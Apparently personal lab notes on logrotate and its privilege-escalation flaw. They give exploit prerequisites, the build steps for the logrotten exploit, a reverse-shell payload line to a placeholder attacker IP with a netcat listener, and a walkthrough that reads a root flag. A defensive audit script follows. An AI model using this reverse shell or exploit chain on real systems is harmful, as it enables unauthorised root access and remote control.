# Intro

- Linux produces large amounts of log files
- To prevent disks from overflowing, a tool called `logrotate` takes care of archiving or disposing of old logs
- Also, searching through many large log files is time-consuming
- To prevent this and save disk space, `logrotate` has been developed
- The logs in `/var/log` give admins the info they need to determine the cause behind malfunctions
- Almost more important are the unnoticed system details, such as whether all services are running correctly
- `logrotate` has many features for managing these log files
- These include the specification of:
    - `size` of the log file
    - `age` of the log file
    - `action` to be taken when one of these factors is reached

```bash
# for more info
man logrotate
logrotate --help
```

- The function of the rotation itself consists in renaming and dumping the log files
- For example, new log files can be created for each new day, and the older ones will be renamed automatically
- Another example of this would be to empty the oldest log file and thus reduce memory consumption
- Normally, `logrotate` runs periodically via `cron` and is controlled via the configuration file `/etc/logrotate.conf`
- This file contains the global settings that determine how `logrotate` operates

```bash
cat /etc/logrotate.conf
```

- To force a new rotation, we can set the date after the individual log files in the status file `/var/lib/logrotate.status` or use the `-f`/`--force` option
- Below the `logrotate.status` file is shown

```bash
sudo cat /var/lib/logrotate.status

"/var/log/samba/log.smbd" 2022-8-3
"/var/log/mysql/mysql.log" 2022-8-3
```

- We can find the corresponding conf files in `/etc/logrotate.d/` as seen below

```bash
ls /etc/logrotate.d/

alternatives  apport  apt  bootlog  btmp  dpkg  mon  rsyslog  ubuntu-advantage-tools  ufw  unattended-upgrades  wtmp
```

- Now let's drill down into `dpkg`

```bash
cat /etc/logrotate.d/dpkg

/var/log/dpkg.log {
    monthly
    rotate 12
    compress
    delaycompress
    missingok
    notifempty
    create 644 root root
}
```

# Exploiting Logrotate

- To exploit `logrotate`, some prereqs must be met:
    1. we need `write` permissions on the log files
    2. `logrotate` must run as a privileged user or `root`
    3. `logrotate` must be one of the vulnerable versions:
        - 3.8.6
        - 3.11.0
        - 3.15.0
        - 3.18.0
- We can also use a preconfigured exploit named [logrotten](https://github.com/whotwagner/logrotten)
- Below we clone the git repo and compile the C program for `logrotten`

```bash
git clone https://github.com/whotwagner/logrotten.git
cd logrotten
gcc logrotten.c -o logrotten
```

- Next, create a revshell payload

```bash
echo 'bash -i >& /dev/tcp/<kali_ip>/9001 0>&1' > payload
```

- Then, before running the exploit, determine which option `logrotate` uses in `logrotate.conf`

```bash
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

create
```

- As shown above, the option being used is `create`, so we use the exploit adapted to this function
- Start a listener on our Kali box

```bash
sudo nc -lvnp 9001
```

- Finally, run the exploit with the prepared payload and wait for a revshell to hit the listener

```bash
./logrotten -p ./payload /tmp/tmp.log
```

---

# Exercise

## Initial Enum

- `ping` test

![[images/Pasted image 20260209201107.png]]

- `nmap` scans

![[images/Pasted image 20260209201817.png]]

- `ssh` into target with given creds
- light local enum

![[images/Pasted image 20260209201942.png]]

## logrotate enum

- enum `logrotate` ver

![[images/Pasted image 20260209202204.png]]

- ver 3.11.0 is vulnerable to `logrotten`
- list `logrotate.d`

![[images/Pasted image 20260209202222.png]]

- run `cat /etc/logrotate.d/dpkg`

![[images/Pasted image 20260209202330.png]]

## exploit with `logrotten`

- check that we have access to `git` and `gcc`

![[images/Pasted image 20260209202709.png]]

- `git clone` repo on target: running into issues

![[images/Pasted image 20260209203023.png]]

- let's try to pull down the repo on our Kali box and move it to the target
- `git clone` on Kali

![[images/Pasted image 20260209203125.png]]

- host the `.c` file from Kali

![[images/Pasted image 20260209203214.png]]

- grab from target with `wget`

![[images/Pasted image 20260209203304.png]]

- now, compile on target

![[images/Pasted image 20260209203338.png]]

- create a payload with revshell to Kali box

![[images/Pasted image 20260209203527.png]]

- start listener on Kali

![[images/Pasted image 20260209203505.png]]

- determine function for `logrotate`: nothing returned

![[images/Pasted image 20260209203710.png]]

- try running exploit anyways

![[images/Pasted image 20260209203820.png]]

- waiting for `cron` job to run and for a revshell to hit listener...
- nothing

## reset

- use `scp` to move the whole folder this time

![[images/Pasted image 20260209205601.png]]

- compile the C program
- modify payload as below

```bash
echo "cat /root/flag.txt > /home/htb-student/flag.txt" > payload
```

- list `~/backups/`

![[images/Pasted image 20260209204535.png]]

- modify `~/backups/access.log` to trigger exploit

```bash
echo test >> /home/htb-student/backups/access.log; ./logrotten /home/htb-student/backups/access.log -p payload
```

![[images/Pasted image 20260209205911.png]]

- we see the following

![[images/Pasted image 20260209205902.png]]

- now `ls ~` and `cat` flag

![[images/Pasted image 20260209205849.png]]
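Added defensive check for the prereqs listed under Exploiting Logrotate (a log file writable by an unprivileged user that a root-run `logrotate` rotates): this audit helper is not part of the original notes or of `logrotten`. It reads one config fragment in the style of `/etc/logrotate.d/dpkg`, reports the rotation mode in effect, and flags any existing log path that is non-root-owned or group/world-writable; the function name `audit_logrotate_conf` and the temp config it is demoed on are my own constructions.

```shell
#!/bin/sh
# Audit helper (added example, not from the notes or from logrotten):
# for each log path in a logrotate config fragment, print the rotation
# mode and WARN when the log itself is writable by a non-root user,
# which is the precondition the notes above list for the exploit.

# Usage: audit_logrotate_conf /etc/logrotate.d/dpkg
# Prints one OK/WARN/SKIP line per log path; returns 1 if anything was flagged.
# Assumes one log path per block header and paths without spaces.
audit_logrotate_conf() {
    conf="$1"
    flagged=0
    mode="create (default)"
    grep -Eq '^[[:space:]]*copytruncate' "$conf" && mode="copytruncate"
    grep -Eq '^[[:space:]]*create' "$conf" && mode="create"
    # Block headers look like "<path> {"; keep the token before the brace.
    for log in $(grep -E '\{[[:space:]]*$' "$conf" | sed 's/[[:space:]]*{.*//'); do
        if [ ! -e "$log" ]; then
            echo "SKIP $log (not present) mode=$mode"
            continue
        fi
        owner=$(ls -ld "$log" | awk '{print $3}')
        perms=$(ls -ld "$log" | cut -c1-10)   # e.g. -rw-rw-rw-
        case "$perms" in
            ?????w*|????????w*) writable=1 ;;  # group- or world-writable
            *) writable=0 ;;
        esac
        if [ "$owner" != root ] || [ "$writable" = 1 ]; then
            echo "WARN $log owner=$owner perms=$perms mode=$mode (writable by an unprivileged user)"
            flagged=1
        else
            echo "OK   $log owner=$owner perms=$perms mode=$mode"
        fi
    done
    return "$flagged"
}

# Constructed demo input: a temporary config whose log file is world-writable.
demo_dir=$(mktemp -d)
printf 'test\n' > "$demo_dir/app.log"
chmod 666 "$demo_dir/app.log"
cat > "$demo_dir/app.conf" <<EOF
$demo_dir/app.log {
    weekly
    rotate 4
    create 644 root root
}
EOF
audit_logrotate_conf "$demo_dir/app.conf" || echo "found at least one risky log"
rm -rf "$demo_dir"
```

Running it over every file in `/etc/logrotate.d/` (plus `/etc/logrotate.conf`) gives a quick inventory of logs whose ownership or mode should be tightened.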